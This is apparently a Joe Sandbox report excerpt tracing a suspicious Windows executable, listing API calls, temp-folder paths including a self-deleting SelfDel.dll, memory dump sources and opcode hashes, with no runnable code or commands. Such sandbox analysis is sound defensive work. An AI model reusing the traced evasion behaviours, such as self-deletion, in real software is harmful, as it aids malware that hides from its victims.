                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: ItemTextlstrlenwsprintf
                                  • String ID: %u.%u%s%s
                                  • API String ID: 3540041739-3551169577
                                  • Opcode ID: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
                                  • Instruction ID: afd2be291b2a15d2af8ae11ee91158e81c8ac3063311500d61ab43a3e8b0c9b4
                                  • Opcode Fuzzy Hash: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
                                  • Instruction Fuzzy Hash: 6F11E77360423837DB10996D9C45E9E3298DF85374F254237FA66F31D1EA79DC2182E8
                                  APIs
                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405E29
                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405E33
                                  • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E45
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E23
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrcatlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 2659869361-3081826266
                                  • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                  • Instruction ID: d63f260b1a4b66e3edf6d37d75e222a08c60d96d58f132ba82df153afabc7d48
                                  • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                  • Instruction Fuzzy Hash: EDD0A771101534BAC212AB54AC04CDF73ACAF46344342403BF541B30A5C77C5D5187FD
                                  APIs
                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SelfDel.dll), ref: 004026BA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: lstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp$C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SelfDel.dll
                                  • API String ID: 1659193697-2674119624
                                  • Opcode ID: ecb164bffedd8144fd574a38f4990260678b0e323410c3a48bf88ebac77fdc64
                                  • Instruction ID: 017f71272b68274a12e342b3970613002fe1d3414b89f7e2a3fd3533f9475010
                                  • Opcode Fuzzy Hash: ecb164bffedd8144fd574a38f4990260678b0e323410c3a48bf88ebac77fdc64
                                  • Instruction Fuzzy Hash: C7110D72A10206BBCB00BBB19F46AAE7B616F51748F20843FF502F61D1DAFD8851631E
                                  APIs
                                  • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                  • GetTickCount.KERNEL32 ref: 0040306F
                                  • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                  • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                  • String ID:
                                  • API String ID: 2102729457-0
                                  • Opcode ID: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
                                  • Instruction ID: 04dff40eaa5975d4421a2039d3eb5be5080597dcfa90b8d0ab21d67e5ec7c10f
                                  • Opcode Fuzzy Hash: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
                                  • Instruction Fuzzy Hash: BFF05430406621AFC6616F50FD08A9B7B69FB45B12B45843BF145F11E8C73C48818B9D
                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 0040557C
                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004055CD
                                    • Part of subcall function 0040451F: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404531
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: Window$CallMessageProcSendVisible
                                  • String ID:
                                  • API String ID: 3748168415-3916222277
                                  • Opcode ID: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
                                  • Instruction ID: 8cb385540c394feb6b7acedb458c1b163c7bd0e2eecbca803c6ec6ccc0281e24
                                  • Opcode Fuzzy Hash: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
                                  • Instruction Fuzzy Hash: 68017C71101609FBEF205F11DD84A9B3A2BEBC4754F20403BFA05761D5D73A8D929E6D
                                  APIs
                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,007A0728,?,00000800,00000000,?,007A0728,?,?,Del,?,00000000,00406693,80000002), ref: 00406468
                                  • RegCloseKey.ADVAPI32(?), ref: 00406473
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: CloseQueryValue
                                  • String ID: Del
                                  • API String ID: 3356406503-3562819231
                                  • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                  • Instruction ID: 8bbbfa9f798598a3d1dedb2a9c281e33174829b5b93865dedadbfc74a219c892
                                  • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                  • Instruction Fuzzy Hash: 9F01B132110209BADF21CF51CD05EDB3BA8EB44360F018039FD1692150D738DA64DBA4
                                  APIs
                                  • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B69,00403A7F,?,?,00000008,0000000A,0000000C), ref: 00403BAB
                                  • GlobalFree.KERNEL32(00000000), ref: 00403BB2
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: Free$GlobalLibrary
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 1100898210-3081826266
                                  • Opcode ID: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                  • Instruction ID: b7081a2a86391088548fef66407111aafa244a1a89fd4905b066b82f00895e7d
                                  • Opcode Fuzzy Hash: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                  • Instruction Fuzzy Hash: 59E0C23340053057CB211F45ED04B1AB778AF95B26F09807BE940BB2618BBC2C438FC8
                                  APIs
                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KYagm8gq5S.exe,C:\Users\user\Desktop\KYagm8gq5S.exe,80000000,00000003), ref: 00405E75
                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KYagm8gq5S.exe,C:\Users\user\Desktop\KYagm8gq5S.exe,80000000,00000003), ref: 00405E85
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrlen
                                  • String ID: C:\Users\user\Desktop
                                  • API String ID: 2709904686-224404859
                                  • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                  • Instruction ID: e625fb8110be14d05545ed3956eb9dcd351d24123ebbdb87cfc6543e98ba95a5
                                  • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                  • Instruction Fuzzy Hash: 27D05EB3400920AAC312A704DD00DAF73A8EF523447464466F881A71A5D7785D8186EC
                                  APIs
                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB9
                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD1
                                  • CharNextA.USER32(00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE2
                                  • lstrlenA.KERNEL32(00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: lstrlen$CharNextlstrcmpi
                                  • String ID:
                                  • API String ID: 190613189-0
                                  • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                  • Instruction ID: 0ddac3552a90187c63c7b8d1f8650bd486a880c4da7af56fddea67c471c8745b
                                  • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                  • Instruction Fuzzy Hash: 5AF09631104515FFCB029FA5DE04D9FBBA8EF05350B2540B9F880F7250D678DE01ABA9
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1725029777.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1870000_nggwslounqxvwf.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f59c9f5d2ee7bd853c853f1936c0dd414b3dc0a60a74b86e3c454dabb561d2b7
                                  • Instruction ID: 8ff3aac1a49ddc40873dc1e372ad3d67a9380cacfd99327f4efdd397fa8104b3
                                  • Opcode Fuzzy Hash: f59c9f5d2ee7bd853c853f1936c0dd414b3dc0a60a74b86e3c454dabb561d2b7
                                  • Instruction Fuzzy Hash: 2F31F631E053508FCB069B38C4252DE7FB1AF8A315F1584AFD041DB7A2CA359C4ACB92
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1725029777.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1870000_nggwslounqxvwf.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 566d2f42b16f6ea1ffc38e61acf43ea29136285e24858422667f3d7496112565
                                  • Instruction ID: 51759ceaca6eb164e6da5abf38cd55f7f1035ba21d2ac27837d833989fc88748
                                  • Opcode Fuzzy Hash: 566d2f42b16f6ea1ffc38e61acf43ea29136285e24858422667f3d7496112565
                                  • Instruction Fuzzy Hash: 2E3138B0D002489FDB14CFAAD584ADEFFF1AF48310F24806AE959AB350DB349A45CF91
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1725029777.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1870000_nggwslounqxvwf.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0fa46d8a8577eaa39b0de4df5b87101b4cd7ddf08f54d0447326ca3a11e50257
                                  • Instruction ID: 5e9c80af372e127bcdfc5f936af3ca00eda4376685fb7386988b234f097658db
                                  • Opcode Fuzzy Hash: 0fa46d8a8577eaa39b0de4df5b87101b4cd7ddf08f54d0447326ca3a11e50257
                                  • Instruction Fuzzy Hash: FE3116B0D002489FDB14DFAAC584ADEFFF5AF48310F248029E959AB350DB349A45CFA1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1725029777.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1870000_nggwslounqxvwf.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f577da2ecf7350d86085cba98ad97acdee8dd8e34caf173560f5a23b96d4e9fa
                                  • Instruction ID: 469dd1feb32cf75e2837665ec3c0b4dbc6fbb513d51ec75fb5b9dcb579e7e1d8
                                  • Opcode Fuzzy Hash: f577da2ecf7350d86085cba98ad97acdee8dd8e34caf173560f5a23b96d4e9fa
                                  • Instruction Fuzzy Hash: 36219231B04214CFCB199B78C0597AE7BB2AB8A305F14887DE012EB791CE76DC46CB91
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1724637305.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_159d000_nggwslounqxvwf.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 31278eb35fb7ad2b16bf28ae79d7692ca6d533d0d24bc6444cded9bde5008baf
                                  • Instruction ID: 5f1bc3211dde9206521718780f9b6a8f36cf11d7141f3c9aca3fc0c09dca6654
                                  • Opcode Fuzzy Hash: 31278eb35fb7ad2b16bf28ae79d7692ca6d533d0d24bc6444cded9bde5008baf
                                  • Instruction Fuzzy Hash: CE01A7720083849AEB108B99DCC4B6EFFE8FF51325F18C85AED190E282C6789840C772
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1724637305.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_159d000_nggwslounqxvwf.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b0b07da8e3153d9725098cc636d51bfac1f8e61dfddb4605a79687cf38b0f128
                                  • Instruction ID: f78c73e5db387e750fd6e463f8ebe2954eb6ea505efea7c5adaff363231839d4
                                  • Opcode Fuzzy Hash: b0b07da8e3153d9725098cc636d51bfac1f8e61dfddb4605a79687cf38b0f128
                                  • Instruction Fuzzy Hash: 49F06272404384AEEB118B1ADC84B6AFFE8EB51634F18C45AFD484E286C2799844CB71
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1725029777.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1870000_nggwslounqxvwf.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ab194762c9a507c240523311768604ac5c5d379f5f494a4cdd6981ac83de70bb
                                  • Instruction ID: 3ed103f8f5b4ccc9e4fad89166464d4dca1a9f75e26b2d4f469040a2433b1bfc
                                  • Opcode Fuzzy Hash: ab194762c9a507c240523311768604ac5c5d379f5f494a4cdd6981ac83de70bb
                                  • Instruction Fuzzy Hash: 9BE01270A0020ACFEB15DB69D4A8B6D77B0AB49304F104458F112DB2A1DB74C944DF51
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1725029777.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1870000_nggwslounqxvwf.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d7ec79df64730d008f5caf85f51730156ce788572ed4841d682b3f9d140eef8b
                                  • Instruction ID: 6d35c3359720f9afe2784a76be75f432b14c8b69c37d753b6bbc1d30c4ff54c5
                                  • Opcode Fuzzy Hash: d7ec79df64730d008f5caf85f51730156ce788572ed4841d682b3f9d140eef8b
                                  • Instruction Fuzzy Hash: 09E01270A4020ACFEB15DB68C4A8B6E77B0EB45304F104458F011EB2A1DB74C904CF51
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1725029777.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1870000_nggwslounqxvwf.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d60f3f4173d106eb5c4a72adfd8ae9a362b3bdedebdbe88f8caad6b50e97f4df
                                  • Instruction ID: 4722e1efcf123b2a829ebd643b03fb5c94d1e8106f12c0b3748d5b125cf0ef2b
                                  • Opcode Fuzzy Hash: d60f3f4173d106eb5c4a72adfd8ae9a362b3bdedebdbe88f8caad6b50e97f4df
                                  • Instruction Fuzzy Hash: 2AE01270A0020ACFEB15DF69C469B6D77B1BB85304F104858F011DB2A1DB74CD44CF51